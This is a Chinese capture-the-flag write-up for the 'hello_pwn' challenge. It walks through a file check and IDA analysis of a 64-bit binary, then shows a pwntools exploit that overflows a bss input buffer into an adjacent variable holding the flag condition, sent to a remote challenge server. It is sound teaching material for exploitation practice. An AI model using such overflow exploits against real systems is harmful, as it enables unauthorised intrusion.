攻防世界-pwn hello_pwn(地址溢出)

攻防世界-pwn hello_pwn(地址溢出)_第1张图片

0x01 检查文件

攻防世界-pwn hello_pwn(地址溢出)_第2张图片

  • 64位elf 可执行文件
  • 无栈保护
  • 无PIE
     

0x02 运行程序

在这里插入图片描述
程序只有一个输入
 

0x03 IDA静态分析

主函数:

攻防世界-pwn hello_pwn(地址溢出)_第3张图片

sub_400686()

在这里插入图片描述
可以发现只要dword_60106C == 1853186401就可以拿到flag
 
在这里插入图片描述
继续分析发现程序输入的值存储在unk_601068之中,而dword_60106C就在unk_601068之后,并且两个变量都存在于bss段(全局变量段),则可以考虑用unk_601068的输入溢出来更改dword_60106C的值。

0x04 exp

from pwn import *
p = remote('111.198.29.45', 34428)

p.recvuntil("lets get helloworld for bof")
p.sendline("a" * 4 + p64(1853186401))

p.interactive()

取得flag
攻防世界-pwn hello_pwn(地址溢出)_第4张图片

你可能感兴趣的:(ctf_pwn)